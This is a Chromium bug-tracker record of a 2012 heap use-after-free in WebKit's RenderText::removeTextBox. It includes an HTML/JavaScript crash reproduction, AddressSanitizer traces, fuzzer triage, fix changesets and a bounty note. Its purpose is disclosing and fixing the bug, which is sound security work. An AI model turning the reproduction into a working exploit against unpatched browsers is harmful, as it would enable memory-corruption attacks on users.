Project: chromium Issues People Development process History Sign in
New issue
Advanced search Search tips
Starred by 1 user
Status: Fixed
Owner:
Closed: Dec 2012
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Restricted
  • Only users with EditIssue permission may comment.



Sign in to add a comment
Heap-use-after-free in WebCore::RenderText::removeTextBox
Reported by miau...@gmail.com, Mar 29 2012 Back to list


VULNERABILITY DETAILS

use-after-free in WebCore::RenderText::removeTextBox

VERSION
Chrome Version: stable, beta, dev

Chromium	19.0.1085.0 (Developer Build 129583)
OS	Linux
WebKit	536.5 (@112458)

Operating System: 64bit linux

REPRODUCTION CASE
<html>
  <head>
    <style>
      #el0 {
        -webkit-column-count:2;
        display: table-cell;
      }
      #el0::first-letter {
        background-size: auto;
      }
      #el1 {
        float: right;
      }
    </style>
    <script>
      onload = function() {
        el0=document.createElement('div')
        el0.setAttribute('id','el0')
        document.body.appendChild(el0)
        el1=document.createElement('div')
        el1.setAttribute('id','el1')
        el0.appendChild(el1)
        el0.appendChild(document.createTextNode(unescape('%u3200A')))
        document.designMode='on'
        window.getSelection().setBaseAndExtent(el1, 0, el1, 0)
        document.execCommand('InsertLineBreak')
        document.execCommand('selectall')
        document.execCommand('strikethrough')
        document.execCommand('FormatBlock', false, '<'+'pre>')
      }
    </script>
  </head>
  <body>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: renderer + asan
Crash State: 

==32492== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffe761d5c0 at pc 0x55555ad105b7 bp 0x7fffffff3020 sp 0x7fffffff3018
READ of size 8 at 0x7fffe761d5c0 thread T0
    #0 0x55555ad105b7 in WebCore::RenderText::removeTextBox(WebCore::InlineTextBox*) ???:0
    #1 0x55555aa1ce29 in WebCore::InlineTextBox::deleteLine(WebCore::RenderArena*) ???:0
    #2 0x55555aa04e8d in WebCore::InlineFlowBox::deleteLine(WebCore::RenderArena*) ???:0

0x7fffe761d5c0 is located 64 bytes inside of 96-byte region [0x7fffe761d580,0x7fffe761d5e0)
freed by thread T0 here:
    #0 0x55555de50f32 in free ??:0
    #1 0x55555aa8e3c9 in WebCore::RenderBlock::createFirstLetterRenderer(WebCore::RenderObject*, WebCore::RenderObject*) ???:0
    #2 0x55555aa8f0c6 in WebCore::RenderBlock::updateFirstLetter() ???:0
    #3 0x55555aa43e02 in WebCore::RenderBlock::layout() ???:0

 
beta-6496.txt
13.7 KB View Download
stable-6496.txt
13.7 KB View Download
6496.html
923 bytes View Download
6496.txt
13.8 KB View Download
Comment 1 by kenrb@chromium.org, Mar 30 2012
Labels: -Pri-0 -Area-Undefined Pri-1 Area-WebKit SecSeverity-High Mstone-18 OS-All SecImpacts-Stable SecImpacts-Beta
Status: Available
I can see this on trunk in a debugger, though it's tricky because it looks to me like the memory is getting reallocated before use (so it actually shows to me as a bad cast, but it's more likely a use after free).

I have not been able to verify on stable or beta (it doesn't crash for me and I don't have ASAN builds). I'm flagging based on the provided stack traces for those.

Looks like cluster-fuzz is not showing this for some reason?
Comment 2 by kenrb@chromium.org, Mar 30 2012
Scratch that... it just reproduced on CF. I'll attach the test case as soon as the regression range is provided.
Comment 3 by kenrb@chromium.org, Mar 30 2012
Summary: Heap-use-after-free in WebCore::RenderText::removeTextBox (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=32105509

Uploader: kenrb@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f5bb5af96c0
Crash State:
  - crash stack -
  WebCore::RenderText::removeTextBox
  WebCore::InlineTextBox::deleteLine
  - free stack -
  WebCore::RenderBlock::createFirstLetterRenderer
  WebCore::RenderBlock::updateFirstLetter
  
Regressed: https://cluster-fuzz.appspot.com/revisions?range=112953:112954

Minimized Testcase (0.90 Kb): https://cluster-fuzz.appspot.com/download/AMIfv96EzTntiugalR5zGUxbJtbyaRJk-r5kiAR2I0Ke31sqkQJ4ZwpCJUvXBPzTx8jAG_V4fa7v-T7yjaurgwBRFzgw0K_5hDSW9SR61gbSAVqFfA6NbXK0fkD_JimJQ4p8uq6DpwgogLgwVrANb1zb8W5Y1C66EA
Comment 4 by kenrb@chromium.org, Mar 30 2012
Regression range isn't correct.
The repro is not reliable which looks be the reason it wasnt reproducing first in c#1.
I made the repro reliable for CF. report coming.
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=32408814

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7ff469bd8ec0
Crash State:
  - crash stack -
  WebCore::RenderText::removeTextBox
  WebCore::InlineTextBox::deleteLine
  - free stack -
  WebCore::RenderBlock::createFirstLetterRenderer
  WebCore::RenderBlock::updateFirstLetter
  

Minimized Testcase (0.88 Kb): https://cluster-fuzz.appspot.com/download/AMIfv95U06HC2vo6q7QMMBefFCIcXurvUoyhfrYLK_pD8f70LvOdOMD8oiAi0_h6kBQq242sg46hWlOnbvjVao6eUi3DTfCS8vNtp-XW5BfBkPFX4WzbqRyH4VIBcUhD5WVDkbyGtbnaoZEJ-wVq6NUccCBKh8vqRg
Miaubiz, if any of your repros require pressing the refresh button, please do add a location.reload() at end of your repro in the future.
Comment 9 by miau...@gmail.com, Apr 1 2012
is it ok if I add location.reload() to everything just in case? It's not the refresh button which triggers but trying it n-times helps with the flakiness, right? it works 100% on my box (tm) :D
If location.reload() helps to reduce flakiness, then yes. Otherwise, if your repro is 100% reliable without it, then please don't add it.
Comment 11 by miau...@gmail.com, Apr 1 2012
I have no way to tell how it will behave on CF. :(
Comment 12 by kenrb@chromium.org, May 10 2012
Owner: kenrb@chromium.org
Status: Started
Labels: -Mstone-18 Mstone-19
m19 is out, moving milestone m18 bugs to m19.
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/117309
Project Member Comment 16 by clusterf...@chromium.org, May 18 2012
ClusterFuzz has detected this issue as fixed in range 137694:137702.

Detailed report: https://cluster-fuzz.appspot.com/testcase?key=32408814

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7ff469bd8ec0
Crash State:
  - crash stack -
  WebCore::RenderText::removeTextBox
  WebCore::InlineTextBox::deleteLine
  - free stack -
  WebCore::RenderBlock::createFirstLetterRenderer
  WebCore::RenderBlock::updateFirstLetter
  
Fixed: https://cluster-fuzz.appspot.com/revisions?range=137694:137702

Minimized Testcase: https://cluster-fuzz.appspot.com/download/AMIfv95U06HC2vo6q7QMMBefFCIcXurvUoyhfrYLK_pD8f70LvOdOMD8oiAi0_h6kBQq242sg46hWlOnbvjVao6eUi3DTfCS8vNtp-XW5BfBkPFX4WzbqRyH4VIBcUhD5WVDkbyGtbnaoZEJ-wVq6NUccCBKh8vqRg

If you suspect that the result above is incorrect, try re-doing that job on the testcase report page.
Labels: -Merge-Approved Merge-Merged reward-topanel
M19: http://trac.webkit.org/changeset/117875
M20: http://trac.webkit.org/changeset/117876
Labels: -reward-topanel reward-1000 reward-unpaid
Thank you miaubiz. Textbook UAF, $1000
Labels: CVE-2011-3105
Labels: -reward-unpaid
Project Member Comment 21 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Status: Fixed
Project Member Comment 23 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -SecSeverity-High -SecImpacts-Stable -SecImpacts-Beta -Mstone-19 Cr-Content Security-Impact-Stable Security-Impact-Beta Security-Severity-High M-19 Type-Bug-Security
Project Member Comment 24 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 25 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 27 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 28 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 29 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 30 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 31 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 32 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 33 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic
Sign in to add a comment